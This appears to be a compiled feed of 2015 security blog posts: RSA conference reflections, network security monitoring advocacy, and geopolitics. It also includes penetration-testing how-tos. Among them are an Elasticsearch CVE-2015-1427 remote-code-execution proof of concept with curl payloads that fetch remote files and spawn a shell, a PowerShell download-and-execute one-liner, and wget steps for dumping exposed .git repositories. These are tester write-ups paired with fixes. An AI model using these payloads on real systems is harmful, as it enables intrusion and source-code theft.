My talk was no exception, of course, and for good reason. The DevOps and DevOpsSec movement is well underway now and, frankly, smart automation is the only way we will ever scale to address the threat landscape. We've seen pockets of automation for ages, but the notion that we can automate some risk mgmt. decisions through to remediation activities is new and, for many, uncomfortable.

It will be interesting to see how the reality compares with the promise of automation, machine learning, and AI in the near future. For once, I feel optimistic about the future of the IT industry, even if it leads to the eventual demise of the security industry as we know it today.

2) Eating our own!

Another interesting theme from the event was the increased "eating our own" rhetoric, ironically from some of the major vendors in the space. Yes, the indsutry is a self-perpetuating delusion. Many of us have said this for years. It was just interesting to see large vendors parroting this line (all the while hocking their wares). Cognitive dissonance much? ;)

3) Hiring, hiring everywhere!

I don't think I saw a single vendor booth on either expo floor that didn't have a sign somewhere proclaiming that they were hiring. In speaking with the awesome folks at Alta Associates (hi Lauren!), the remarked that never before did they recall being approached at RSAC by so many companies seeking talent! There's no doubt that this is a good time to be looking for opportunities because it appears to be a seller's market.

Of course, that said, I'm also a wee bit skeptical about the nature of many of the positions. I've long since tired of hearing the US Government proclaim a need for "10,000 cyber warriors"... which end up being underpaid low-level people sitting in SCIFs staring at screens and clicking the ocassional alert button (jobs that should, by all rights, be largely replaced with automation and orchestration).

So... yes, there are a lot of jobs out there, a lot vendor hiring, but caveat emptor.

Parting Sh^M^MThoughts...

It was great to see so many people (friends/colleagues/Romans/countrymen) who I often only see during RSA week. It's always fun to catch-up on lives and hugs.

The parties/receptions were just too much, and I felt completely adrift without a Barracuda party to anchor the evening. In past years, it's become an unstated understanding amongst friends that we'll go do the events we're expected to do, but will catch-up in the end with the 'cuda party. No joy this year, which left a feeling of disorientation.

Overall, the event has hit the "too big" point. I think the program folks need to figure out how to start convening smaller communities within the overall event context. The receptions do a poor job of this, and I think we really need to come up with a better way to encourage more discussion and more interaction and more collaboration. Part of me wonders if the tracks need to evolve behind their fairly static approach to become more like mini-events within the larger event framework. I think we see this a little bit in some of the specialty tracks, like Law and Crypto, but how do we better facilitate more social interaction within these tracks?

A couple ideas that come to mind would be running track-specific networking receptions to kickoff sessions. It could also be interesting to have post-session networking areas where conversations can continue. I'd love to see designated zones within the event for each track, perhaps with shared communal spaces for after-chats with reasonably adjacent tracks. Anyway...

Other than that, I think this was yet another successful event. It's amazing how big it's gotten in the past decade. Sure, our industry is growing like mad (emphasis on the insanity;), but it's nice to see that reflected in the event, too.

I'm eager to see continued growth in the event, and hopefully additional maturity. I liked not having "booth babes" shoved in my face during the event. Kudos to the event management team for adding the dress code provision for expo floor staff because it was definitely an improvement. I'm starting to think that the next step should be to start shrinking the max space allowed for vendors, too. The north expo hall was well beyond the absurd this year.

In closing, an offer: If anybody wants to see my RSAC talk, "Automate or Die! How to Scale and Evolve to Fix Our Broken Industry," please get in touch. Cover my travel and I'm willing to make a quick trip to most places to deliver it.

Hope to see you at RSAC 2016, if not sooner! :)

Example of Chinese Military Converging on US Military

Richard Bejtlich — Mon, 13 Apr 2015 17:33:00 +0000

We often hear of vulnerabilities in the US military introduced by net-centric warfare and a reliance on communications network. As the Chinese military modernizes, it will introduce similar vulnerabilities.

I found another example of this phenomenon courtesy of Chinascope:

PLA Used its Online Purchasing Website for its First Online Purchase

Written by LKY and AEF

Xinhua reported that on, April 7, the PLA announced that five manufacturers won the bidding, totaling 90 million yuan (US$14.48 million), to supply general and maintenance equipment to the PLA. The article said that these were the first purchase orders that the PLA received since it launched its military equipment purchasing website in January. The site is at http://www.weain.mil.cn/.

The PLA claimed that it saved close to 12 million yuan (US$1.93 million) compared to the list price. The purchase order consisted of items such as containers for maintenance equipment and tools, gas masks, carrier cases, and army field lighting. The article said that the PLA equipment purchasing website was launched on January 4. On February 25, the PLA General and Maintenance department made a public announcement on the website calling for bids. On March 19, the public bidding was held at Ordnance Engineering College in Shijiazhuang City of Hebei Province.

Over 20 manufacturers submitted bids and 5 of them, including some privately owned companies, won the bidding.

Source: Xinhua, April 12, 2015
http://news.xinhuanet.com/info/2015-04/12/c_134143641.htm

(emphasis added)

You can imagine the sorts of opportunities this story presents to adversaries, including impersonating the Chinese Web site, phishing either party (supplier or purchaser), and so on.

I expect other militaries to introduce similar vulnerabilities as they modernize, presenting more opportunities for their adversaries.

Network Security Monitoring Remains Relevant

Richard Bejtlich — Mon, 13 Apr 2015 15:25:00 +0000

Cylance blogged today about a Redirect to SMB problem found in many Windows applications. Unfortunately, it facilitates credential theft. Steve Ragan wrote a good story discussing the problem. Note this issue does not rely on malware, at least not directly. It's a problem with Microsoft's Server Message Block protocol, with deep historical roots.

(Mitigating Service Account Credential Theft on Windows [pdf] is a good paper on mitigation techniques for a variety of SMB problems.)

Rather than discussing the technical problem, I wanted to make a different point. After reading about this technique, you probably want to know when an intruder uses it against you, so you can see it and preferably stop it.

However, you should be wondering if an intruder has already used it against you.

If you are practicing network security monitoring (described most recently in my newest book), then you should already be collecting network-based evidence of this attack.

You could check session data and infer that outbound traffic on using traditional SMB ports like 139 or 445 TCP are likely evidence of attack.
You could review transaction data for artifacts of SMB traffic, looking for requests and replies.
Best of all, you could review full content data directly for SMB traffic, and see exactly what happened.

Whenever you see a discussion of a new attack vector, you will likely think "how do I stop it, or at least see it?"

Don't forget to think about ways to determine if an attacker has already used it against you. Chances are that certain classes of intruders have been exercising it for days, weeks, months, or perhaps years before it surfaced in the media.

PS: This post may remind you of my late 2013 post Linux Covert Channel Explains Why NSM Matters.

Please Support OpenNSM Group

Richard Bejtlich — Sun, 12 Apr 2015 11:25:00 +0000

Do you believe in finding and removing intruders on the network before they cause damage? Do you want to support like-minded people? If you answered "yes," I'd like to tell you about a group that shares your views and needs your help.

In August 2014, Jon Schipp started the Open (-Source) Network Security Monitoring Group (OpenNSM). Jon is a security engineer at the National Center for Supercomputing Applications at the University of Illinois at Urbana-Champaign. In his announcement on the project's mailing list, Jon wrote:

The idea for this group came from a suggestion in Richard Bejtlich's most recent book, where he mentions it would be nice to see NSM groups spawn up all over much like other software user groups and for the same reasons.

Network security monitoring is the collection, analysis, and escalation of indications and warnings to detect and respond to intrusions. It is an operational campaign supporting a strategy of identifying and removing intruders before they accomplish their mission, thereby implementing a policy of minimizing loss due to intrusions. At the tactical and tool level, NSM relies on instrumenting the network and applying hunting and matching to find intruders.

Long-time blog readers know that I have developed and advocated NSM since the late 1990s, when I learned the practice at the Air Force Computer Emergency Response Team (AFCERT).

I am really pleased to see this group holding weekly meetings, which are available live or as recordings at YouTube.

The group is seeking funding and sponsorship to build a NSM laboratory and conduct research projects. They want to give students and active members hands-on experience with NSM tools and tactics to conduct defensive operations. They outline their plans for funding in this Google document.

I decided to support this group first as an individual, so I just donated $100 to the cause. If you are a like-minded individual, or perhaps represent an organization or company, please consider donating via GoFundMe to support this OpenNSM group and their project. You can also follow them @opennsm and Facebook, and check out their notes at code at GitHub. Thank you!

RSA Crowdsourced Talks: Yay Judges, Boo Vendors!

Ben Tomhave — Fri, 10 Apr 2015 19:31:02 +0000

(Note: To be up front, two things to bear in mind: 1) Yes, my talk was selected for this track. 2) I started this piece before selections were announced but held off on publishing until after selection announcements were made as I wanted to see how things played out.)

For the first time, the RSA Conference US 2015 has added a track for crowdsourced talks (original announcement). This track provided an opportunity for submissions to be voted on by the population at large (not just registered attendees), which I found to be very cool. For me, it provided a great opportunity to see if my proposed talk title resonated with people.

Overall, I'm very excited about this opportunity and advancement. The process wasn't perfect by any means (see Britta Glade's reflective post on changes for next year), but overall the outcome appears to me to be a good selection of new talks.

Of course, there were a couple nits, including active ballot stuffing (see one submitter's "theoretical" description - unsurprisingly, his 4 talks held top-5 ranking on the leaderboard throughout voting... and he's not on the final speaker list).

What I found most egregious, however, was the dearth of vendor talks, many of which failed to even try to appear like something other than shilling (I mean, come on Ken Levine, do you seriously expect us to believe you'd give a talk on "why DLP sucks" and not distinguish "except for my company" given your position as CEO of a DLP company?). This is why we can't have nice things. What was created as an opportunity for talks to be included in the program that might not otherwise get noticed or accepted ended up looking like a race between vendors to see who's marketing team and customer base could stuff the ballot box better. *sigh*

The good news is that the judges did an excellent job following-through and making sure that selected talks represent a reasonable value proposition (no shilling!) for attendees. Big kudos to the judges for not being afraid to dive down into the vote rankings to pull out what appears to be a really awesome list of presentations (here's the final list).

Now it's up to attendees to help make this track truly successful! I hope that everyone registered to attend the confernece will come spend some time in the crowdsourced track to support speakers, whether you voted for them or not. If you want to have your voices heard, then participation and support for innovating new approaches is critical!

I look forward to catching up with everyone in San Francisco. I'll be there Tues-Thurs (including, of course, speaking at 9:10am PT on Thursday). Ping me on twitter (@falconsview) if you want to coordinate crossing paths. :)

Running System Commands Against Multiple SSH Servers with Fabric

noreply@blogger.com (CG) — Wed, 08 Apr 2015 13:00:00 +0000

Fabric is a python library to automate tasks

As the README says:
Fabric is a Python (2.5-2.7) library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks.

More specifically, Fabric is:
A tool that lets you execute arbitrary Python functions via the command line;
A library of subroutines (built on top of a lower-level library) to make executing shell commands over SSH easy and Pythonic.

http://docs.fabfile.org/en/latest/tutorial.html

Quick and dirty script to get the same output as we did with the Metasploit post

$cat fab_ssh.py

from fabric.api import run,env

env.hosts = ['root@192.168.1.50:22', 'root@192.168.1.51:22']
env.passwords = {'root@192.168.1.50:22': 'password1, 'root@192.168.1.51:22': 'password2'}

def host_uptime():
run('uptime')

And now lets run it

$fab host_uptime -f fab_ssh.py
from fabric.api import run,env
[root@192.168.1.50:22] Executing task 'host_uptime'
[root@192.168.1.50:22] run: uptime
[root@192.168.1.50:22] out: 07:08:26 up 22 days, 11:12, 1 user, load average: 0.00, 0.03, 0.05
[root@192.168.1.50:22] out:

[root@192.168.1.51:22] Executing task 'host_uptime'
[root@192.168.1.51:22] run: uptime
[root@192.168.1.51:22] out: 07:08:32 up 22 days, 11:12, 1 user, load average: 0.07, 0.02, 0.00
[root@192.168.1.51:22] out:

Done.
Disconnecting from root@192.168.1.50... done.
Disconnecting from root@192.168.1.51... done.

Running System Commands Against Multiple SSH Servers With Metasploit

noreply@blogger.com (CG) — Mon, 06 Apr 2015 13:30:00 +0000

Want:
To run a command against multiple SSH servers and you want to use metasploit to do it

How:
There doesn't exist a multi_ssh_exec type aux module to run commands. Luckily ? the ssh_login module creates a command shell session for you, on successful logins. You can use the builtin sessions functionality to run a command against all your (SSH) sessions.

msf auxiliary(ssh_login) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

-K Terminate all sessions
-c Run a command on the session given with -i, or all
-d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
-k Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-t Set a response timeout (default: 15)
-u Upgrade a shell to a meterpreter session on many platforms
-v List verbose fields

Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6

So given some sessions, you can pass a

sessions -c 'command' all

against all the sessions or a

sessions -c 'command' -i 2,4,5

against specified sessions.

Example:

RSA 2015: A Quick Trip

Ben Tomhave — Mon, 30 Mar 2015 17:43:03 +0000

Just a quick note, mainly to let you all know that I'm still alive and that this blog will start having content again soon. First, though, I'm finishing getting up-to-speed on things in my new gig with K12.

In the meantime, I am pleased to announce that I will be at RSA US 2015 in April, at least for a few days. I'm flying out to San Francisco on Tuesday, April 21st, and will plan to stay through at least Thursday, if not Friday morning.

Toward that end, you can help me out (a LOT) by voting for my crowdsourced talk submission. To read full details and indicate your support (please!:), go here: Automate or Die! How to Scale and Evolve to Fix Our Broken Industry.

The Attack on GitHub Must Stop

Richard Bejtlich — Fri, 27 Mar 2015 19:40:00 +0000

For many years, private organizations in the West have endured attacks by the Chinese government, its proxies, and other parties. These intruders infiltrated private organizations to steal data. Those not associated with the targeted organizations were generally not directly affected.

Today an action by the Chinese government is affecting millions of users around the world. This is unacceptable.

You may be aware that an American technology company, GitHub, is suffering a massive distributed denial of service attack, at the time of writing.

According to Insight Labs, Internet traffic within China is being manipulated, such that users are essentially attacking GitHub. They are unwittingly requesting two sites hosted by GitHub. The first is a mirror of the Chinese edition of the New York Times (blocked for several years). The other is a mirror of the GreatFire.org Web site, devoted to discovering and exposing Internet filtering by China's "Great Firewall."

As noted in this Motherboard story, it's unlikely a party other than the Chinese government could sustain this attack, given the nature of the traffic injection within the country's routing infrastructure. Even if somehow this is not a state-executed or state-ordered attack, according to the spectrum of state responsibility, the Chinese government is clearly responsible in one form or another.

It is reprehensible that the censorship policies and actions of a nation-state are affecting "over 3.4 million users and with 16.7 million repositories... the largest code host in the world." (Source)

The Chinese government is forcing GitHub to expend its private resources in order to continue serving its customers. I call on the US government, and like-minded governments and their associates, to tell the Chinese to immediately stop this activity. I also believe companies like IBM, who are signing massive IT deals with "Chinese partners," should reconsider these associations.

Can Interrogators Teach Digital Security Pros?

Richard Bejtlich — Tue, 24 Mar 2015 16:38:00 +0000

Recently Bloomberg published an article titled The Dark Science of Interrogation. I was fascinated by this article because I graduated from the SERE program at the US Air Force Academy in the summer of 1991, after my freshman year there. SERE teaches how to resist the interrogation methods used against prisoners of war. When I attended the school, the content was based on techniques used by Korea and Vietnam against American POWs in the 1950s-1970s.

As I read the article, I realized the subject matter reminded me of another aspect of my professional life.

In intelligence, as in the most mundane office setting, some of the most valuable information still comes from face-to-face conversations across a table. In police work, a successful interrogation can be the difference between a closed case and a cold one. Yet officers today are taught techniques that have never been tested in a scientific setting. For the most part, interrogators rely on nothing more than intuition, experience, and a grab bag of passed-down methods.

“Most police officers can tell you how many feet per second a bullet travels. They know about ballistics and cavity expansion with a hollow-point round,” says Mark Fallon, a former Naval Criminal Investigative Service special agent who led the investigation into the USS Cole attack and was assistant director of the federal government’s main law enforcement training facility. “What as a community we have not yet embraced as effectively is the behavioral sciences...”

Christian Meissner, a psychologist at Iowa State University, coordinates much of HIG’s research. “The goal,” he says, “is to go from theory and science, what we know about human communication and memory, what we know about social influence and developing cooperation and rapport, and to translate that into methods that can be scientifically validated.” Then it’s up to Kleinman, Fallon, and other interested investigators to test the findings in the real world and see what works, what doesn’t, and what might actually backfire.

Does this sound familiar? Security people know how many flags to check in a TCP header, or how many bytes to offset when writing shell code, but we don't seem to "know" (in a "scientific" sense) how to "secure" data, networks, and so on.

One point of bright light is the Security Metrics community. The mailing list is always interesting for those trying to bring counting and "science" to the digital security profession. Another great project is the Index of Cyber Security run by Dan Geer and Mukul Pareek.

I'm not saying there is a "science" of digital security. Others will disagree. I also don't have any specific recommendations based on what I read in the interrogation article. However, I did resonate with the article's message that "street wisdom" needs to be checked to see if it actually works. Scientific methods can help.

I am taking small steps in that direction with my PhD in the war studies department at King's College London.

DevOoops: Revision Control (git)

noreply@blogger.com (CG) — Mon, 23 Mar 2015 13:30:00 +0000

Exposed git resources is probably the most gruesome low2pwned issues out there right now.

Leaving this exposed allows an attacker to potentially download the full source of the site along with any other files that are in the git repository.

Ron's blog post on skullsecurity (see Resources) was my first exposure to the subject. I actually blogged about it back in 2012: http://carnal0wnage.attackresearch.com/2012/10/git-you-some-with-dvcs-pillage.html

There are basically two attack paths; if directory listings are on and if they are off.

I've actually talked about the fun things you can find when directory listings are on here:
http://carnal0wnage.attackresearch.com/2012/05/from-low-to-pwned-4-browsable.html

sidenote--> yikes that was almost 3 years ago

If directory listings are on you can simply wget the .git subdirectories, issue a git command and recreate the entire site.

$ mkdir git-test
$ cd git-test
$ wget --mirror --include-directories=/.git http://www. example.com/.git

Then
$ cd www.example.com
$ git reset --hard HEAD is now at [...]

You now have the source of the site.

In case you were wondering how common this is:

If directory indexing is not enabled, you can still check for the presence of the .git folder and you'll have to essentially brute force what you need using git fsck. DVCS-Pillage and DVCSRipper do this for you.

I do this by looking for files like .git/config.

Decent admins will give you 404 or 403 for .git/ but will return the contents of .git/config.

You can then run DVCS-Pillage/dvcs-ripper to pull down the files.

One thing that will sometimes happen is that you can download parts of the git repo but the tools mentioned above will fail to get the whole thing. you can just

git cat-file -p sha1hash

To see the contents of that particular piece. An example from:

https://blog.netspi.com/dumping-git-data-from-misconfigured-web-servers/

Even if its failing to grab everything you might catch a break if are getting "some" of the site.

Resources
https://blog.skullsecurity.org/2012/using-git-clone-to-get-pwn3d
https://blog.netspi.com/dumping-git-data-from-misconfigured-web-servers/
https://github.com/evilpacket/DVCS-Pillage
https://github.com/kost/dvcs-ripper

Fixes (quick Google searches, didnt test)

Apache

or

RedirectMatch permanent .*\.(svn|git|hg|bzr|cvs)/.* /

nginx

location ~ /.git/ {
deny all;
}

.htaccess
Put in root of the webserver

RedirectMatch 404 (?i)\.git

IIS
Couple answers here, although none marked as "the answer"
http://serverfault.com/questions/23340/ignoring-svn-directories-under-iis

also http://www.petefreitag.com/item/823.cfm (Great site BTW)

Metasploit and MSGRPC

noreply@blogger.com (CG) — Mon, 16 Mar 2015 13:30:00 +0000

I wanted to automate connecting to MSGRPC. I did find a few older tutorials on the subject:

http://blog.spiderlabs.com/2012/01/scripting-metasploit-using-msgrpc-.html
http://jumpespjump.blogspot.com/2013/05/metasploit-msgrpc-with-python-on-kali.html
https://www.fishnetsecurity.com/6labs/blog/scripting-metasploit-python
https://khr0x40sh.wordpress.com/2012/05/
http://www.jeffbryner.com/blog/itsec/pythonmetasploitmsgpack.html

You're best bet is still the spiderlabs post. However the piece of code using this:

cmd = """use auxiliary/scanner/snmp/snmp_login set RHOSTS %s run """ % host_list

Doesnt seem to work anymore. It took me awhile to find a solution. I eventually found a post on the rapid7 community page from hdm saying to try to set it up line by line, which is what I ended up doing.

Other stuff you'll need

https://github.com/SpiderLabs/msfrpc --simple wrapper for the calls
https://community.rapid7.com/docs/DOC-1516 -- API docs

Anyway the below is just a simple python script to read in a text file of hosts, create a database to hold the results, set up and run an auxiliary module

Here is a gist with the file:
https://gist.github.com/carnal0wnage/5f5f64432738fc25c538#file-msgrpc_ssh_version-py

and if you just want to read it here (picture)

Gist of python code

In action

Hope it helps

-CG

Leaving Gartner, Joining K12

Ben Tomhave — Fri, 13 Mar 2015 12:46:18 +0000

Today, Friday the 13th, is my last day with Gartner. I've been onboard for almost exactly 21 months now and have learned quite a few things about how the analyst world works. But... it's time for a change. It's time to get back to more of a field role where I can feel like I'm making a difference, seeing the needle move little by little. This is something you don't typically get to see as an analyst because, out of the hundreds of interactions you have each year, /maybe/ 10% result in some form of feedback, and only a small portion of that feedback is particularly meaningful.

On Monday I start my new role as security architect with a local, public company - K12. They're a leading provider of online education services, which I find interesting and exciting. In many ways, this will be a green field opportunity for me, working as part of an enterprise architecture (EA) team as they pivot into more of a DevOps style approach. More than anything I'm greatly looking forward to getting back to more hands-on work where I can see the fruits of my labors.

I'll be reviving this blog in the coming weeks as I start to get my feet wet with various projects. I'll also be putting up a couple retrospective posts about my time as an analyst. I've received a handful of queries from folks interested in working for the company, and so one of these posts will specifically target that audience.

Overall, I'm very much looking forward to the new opportunity! I can't wait to see how well my theories play in the real world. There are lots of exciting options to be pursued here, ranging from security analytics to risk analytics to SecDevOps automation. :) Now to see what sticks and what doesn't!! :)

ElasticSearch CVE-2015-1427 RCE Exploit

noreply@blogger.com (CG) — Wed, 11 Mar 2015 16:41:00 +0000

References:
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048

Since the exploit is already out here [XiphosResearch github] and here [in a comment :-) ] and here [Metasploit pull request]

POC's

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\") getRuntime() exec(\"wget -O /tmp/testy http://192.168.1.1:8080/es_test.txt\")"}}}'

$ cat /tmp/testy
It worked :-)

---

python elastic_shell.py 127.0.0.1
--snip--
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
elasticsearch
elasticsearch-service-mgr.exe
elasticsearch-service-x64.exe
elasticsearch-service-x86.exe
elasticsearch.bat
elasticsearch.in.bat
elasticsearch.in.sh
plugin
plugin.bat
service.bat
~$

To fix disable groovy scripting in config/elasticsearch.yml and upgrade to 1.4.3+

script.groovy.sandbox.enabled: false

PowerShell-AD-Recon by PyroTek3

noreply@blogger.com (CG) — Mon, 09 Mar 2015 13:30:00 +0000

Found a couple of fun PowerShell enumeration scripts here:

https://github.com/PyroTek3/PowerShell-AD-Recon

C:\temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"

Processing XX (user and computer) accounts with MS SQL SPNs discovered in AD Forest DC=UNLUCKY,DC=NET

Domain           : UNLUCKY.NET
ServerName       : unlucklaptop.unlucky.net
Port             :
Instance         : SQLEXPRESS
ServiceAccountDN :
OperatingSystem  : {Windows 8.1 Enterprise}
OSServicePack    :
LastBootup       : 1/10/2015 11:47:55 AM
OSVersion        : {6.3 (9600)}
Description      :


Domain           : UNLUCKY.NET
ServerName       : unluckserver.unlucky.net
Port               : 1433
Instance           :
ServiceAccountDN   : {CN=Svc-blahblah,OU=Service Accounts,,DC=unlucky,DC=net}
OperatingSystem    :
OSServicePack      :
LastBootup         : 12/31/1600 4:00:00 PM
OSVersion          :
Description        :
SrvAcctUserID      : svc-userid
SrvAcctDescription : ---SNIP---

The rest of the repo has fun stuff too

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
-Find Exchange Servers

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
-Get a list of all the service accounts. Those are always good candidates for company defaults

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
-Forest Info

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
-searches for a list of attributes across the forest. This will take a LONG time on a big domain/forest.

default list of stuff:
[String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP","ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV","Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),

ISTS12 Thoughts, Notes, Feedback, Braindump -- Airport Edition

noreply@blogger.com (CG) — Sun, 08 Mar 2015 22:08:00 +0000

--Airport Edition--

Was asked to play on the Red Team for ISTS 12 at Rochester Institute of Technology.

The ISTS even runs similarly to the CCDC events, except they all teams to attack each other for points.

Anyway here are some musing on the weekend in various categories

-Things to tell the teams
-Metasploit vs Canvas
-Thoughts on the game and suggestions

Things to tell the teams:

Mubix has a great deck he updates every year on how to win at CCDC, most of it applies to ISTS. I mentioned to the team that they should review it for next year

http://www.room362.com/blog/2012/03/19/how-to-win-ccdc-slides/

Things I'd add

On *nix and OS X try to learn osquery before the event. This is a pretty quick and easy was to get some host instrumentation on *nix/OS X
Sysinternals tools for windows
Do OSINT on your red team (ideally before the event), check their blogs, see how they *publicly* persist learn to look for that stuff during the event. Example: Raf from Strategic Cyber (Cobalt Strike) was there, using beacon. Read his docs on how beacon works or how he does other persistence and go look for it.
Have team roles
Decide if you want to win, attack, defend, etc. A bunch of points came during the ISTS event came from doing challenges. In fact it looked like most teams abandoned securing hosts and worked on challenges as there we more points to be made doing that than keep services up.
pwnwiki
make your own personal wiki to keep up with how you hack stuff

Life Stuff

Have fun--If something isn't making you happy and you have the option NOT to do it. Then don't. You have the rest of your life to work. Ian mentioned this in his keynote.
Manage your social media presence. If you want to post drunk pictures then create your _sec twitter handle and keep that one professional. Its hard to get rid of trolls once you have them and employers are going to check you out online.
Blog. Blogs are for you and your notes. They have the added benefit of (hopefully) being useful for others or serving as a time capsule for your evolution in your career.
Learn devops tools. Chef, vagrant, docker, packer, ansible, fabric, AWS, nonsql databases (memcache, mondo, redis), Elasticsearch. There are all super powerful tools and they almost all create security vulnerabilities too.
Learn to program. Ruby or Python && bash for scripting. C++/C# for hardore shiz.
Its easier to go from red to blue than blue to red, but easier to go from IR to red.
Stay at company until you and the company no longer get value from each other unless there is a monetary reason to stay a bit longer (vesting).
Make friends with people you can meet in person too.
Invest your money from the beginning, by they time you realize you haven't been saving enough you are going be old(ish) and have to devote much more cash to plus up the 401k/IRA than you would have needed to if you just started saving that 10% in your 20's.
Have fun.

Metasploit vs Canvas
--mostly because someone asked on twitter--
CCDC events give me the ability to try things and get caught which is something i didn't always get to do as a consultant. During these events i get to post cool pictures of me popping shells with Metasploit and Canvas. I used to have a copy of Core Impact and was able to use that too...sadly no more.

I'm primarily a Metasploit guy but its nice to have an alternate source of exploit. For example at ISTS there were hosts vuln to DCOM but the metasploit module didn't work. The Canvas version did. Other examples Canvas ships with a Windows rootkit (HCN) and has more linux local exploits. Metasploit has mimikatz and token stealing built in.

Thoughts on the game and suggestions

First, I had lots of fun so thanks to Bryan and Jared for inviting me.

Game runs with 3 objectives. Defend. Attack other teams, Solve Challenges.

The organizers have added the attack portion to differentiate themselves from CCDC events. The problem i see is that it's 5 person teams and thats just not enough people to do all 3 objectives.

Stuff i didn't like

It is not clear what services are required to run on each host for scoring--this is actually a gripe with MACCDC as well.
No scoring for Red Team or no scoring hit for system compromises
The objectives didn't seem equally weighted, teams abandoned keeping services up and solved challenges as their were more points to be obtained doing challenges

Stuff I liked

Preowned stuff for lolz
Teams could barter to get access back to their stuff
Red Team freedom to do whatever
Internet access
Newish OS's so we could do powershell attacks
Oldish OS's so you could do old school stuff
Web app vulns

Suggestions

-I'd love to see these events use money instead of points. Service availability equals income for most companies. If the scoreboard showed it in dollar values it **may** make service availability more fun for the teams. Specially if they got bonuses for uptime and what not.

-Points for IR for the blue teams. Identify a red team attack, write it up, get points or $$ for the write up and signatures

-Network monitoring devices so teams can see attacks coming in --if they configure it or maybe preconfigure it, then they can write snort alerts or yara rules to identify interesting things.

-Add devops services; its real world and people are more likely to see elastic search than freebsd when they graduate

-Focus more on one of the three objectives; don't care which just pick

-Identify critical systems that cant be down (email, web, etc) [Thanks Mubix]

-Equal weighting on objectives if you keep them all. If you earn 1000 points doing challenges but all your services are down you should also lose 1000 points [Thanks Mubix]

Effective Cybersecurity Communication: Presentation at Emerald Downs IV, WA

Fri, 06 Mar 2015 16:56:14 +0000

I got to give about…half…of this presentation this week near Seattle. Obviously it’s missing a lot without the verbal presentation, but I think it’s a good one and maybe folks can get value out of the deck.

Filed under: Cybersecurity General Tagged: communicating, communication, context, Cyber Security, cybersecurity, education, infosec, lenses context perspective, perspective, presentation

IDS And Security Data Visualization Theory and Practice: A Video

Tue, 03 Mar 2015 07:18:43 +0000

Oh wow…talk about a throwback. I just discovered this video of me at the first ReCon in 2005 talking about IDS and Security Data Visualization Theory and Practice. It’s all still completely valid. Enjoy!!!

https://archive.org/details/recon-2005-visual-analysis

Filed under: Art, Code & Development, Technology Tagged: data visualization, IDS Visualization Talk, ReCon Conference, Security Visualization Theory

Why Would Iran Welcome Western Tech?

Richard Bejtlich — Mon, 02 Mar 2015 22:10:00 +0000

I noticed an AFP story posted by Al Jazeera America titled Iran could allow in Google, other tech companies if they follow rules. It included the following:

Iran could allow Internet giants such as Google to operate in the the country if they respect its "cultural" rules, Fars news agency said on Sunday, quoting a senior official.

"We are not opposed to any of the entities operating in global markets who want to offer services in Iran," Deputy Telecommunications and Information Technology Minister Nasrollah Jahangard reportedly told Fars.

"We are ready to negotiate with them and if they accept our cultural rules and policies they can offer their services in Iran," he said.

Jahangard said Iran is "also ready to provide Google or any other company with facilities" that could enable them to provide their services to the region.

These statements caught my eye because they contrast with China's actions, in the opposite direction. For example, on Friday the Washington Post published China removes top U.S. tech firms from government purchasing list, which said in part:

China has dropped several top U.S. technology companies, including Cisco and Apple, from a list of brands that are approved for state purchases, amid a widening rift with the United States about cyberspace...

Other companies dropped included Apple, Intel’s McAfee security software firm, and network and server software company Citrix Systems. Hewlett-Packard and Dell products remained on the list.

“The main reason for dropping foreign brands is out of national security. It’s the effect of Snowden and PRISM,” said Mei Xinyu, a researcher with the Ministry of Commerce. “When it comes to national security, no country should let their guard down.”

So why would Iran "let their guard down," to use Mei Xinyu's suggestion?

It's possible Iran is trying to encourage a favorable resolution to the nuclear power negotiations currently underway. I don't think its stance on technology is going to move the negotiations one way or another, however.

It's more likely that Iran recognizes that it lacks the sorts of national champions found in China. Iran isn't at the point where a local version of Cisco or Apple could replace the American brands. China, in contrast, has Huawei and ZTE for telecoms and Xiaomi (and others) for smartphones.

Iran might also be smart enough to realize that American brands could be the "safest" and most "secure" brands available, given the resistance of American tech companies to perceptions that they work on behalf of the US intelligence community.

At the New America cyber event last week, Bruce Schneier noted that the Cold War mission of the NSA was to "attack their stuff, and defend our stuff." However, when we "all use the same stuff," it's tougher for the NSA to follow its Cold War methodology.

I stated several times last week in various locations that countries like China who adopt their own national tech champions are essentially restoring the Cold War situation. If China rejects American technology, and runs its own, it will once again be possible for the NSA to "attack their stuff, and defend our stuff."

In that respect, I encourage the Chinese to run their own gear.

DevOoops: Revision Control (Subversion)

noreply@blogger.com (CG) — Mon, 02 Mar 2015 14:00:00 +0000

Subversion 1.6 (and earlier)

Check for .entries files

Walk svn chain to retrieve source

Example:
http://somedomain.com/.svn/text-base/index.php.svn-base
http://somedomain.com/.svn/entries

Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_scanner

msf auxiliary(svn_scanner) > run

[*] Using code '404' as not found.

